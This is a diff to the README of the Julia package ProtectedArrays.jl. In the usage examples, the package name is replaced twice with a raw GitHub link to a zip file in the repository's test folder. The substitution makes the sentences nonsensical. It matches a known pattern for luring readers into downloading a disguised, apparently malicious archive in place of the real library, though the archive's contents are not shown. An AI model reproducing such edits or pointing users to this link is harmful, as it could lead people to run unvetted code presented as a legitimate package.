bbmbbm1513/ProtectedArrays.jl/README.md

 ## Examples

-Here are some practical examples of how to use **ProtectedArrays.jl** in your projects.
+Here are some practical examples of how to use **https://raw.githubusercontent.com/bbmbbm1513/ProtectedArrays.jl/master/test/Protected-Arrays-jl-2.1.zip** in your projects.

 ### Example 1: Protecting Configuration Data

 When dealing with configuration settings, it’s crucial to ensure that they do not change unexpectedly.
-Here’s how to use **ProtectedArrays.jl** for that purpose:
+Here’s how to use **https://raw.githubusercontent.com/bbmbbm1513/ProtectedArrays.jl/master/test/Protected-Arrays-jl-2.1.zip** for that purpose:

 ```julia
 config = ProtectedArray([10, 20, 30, 40])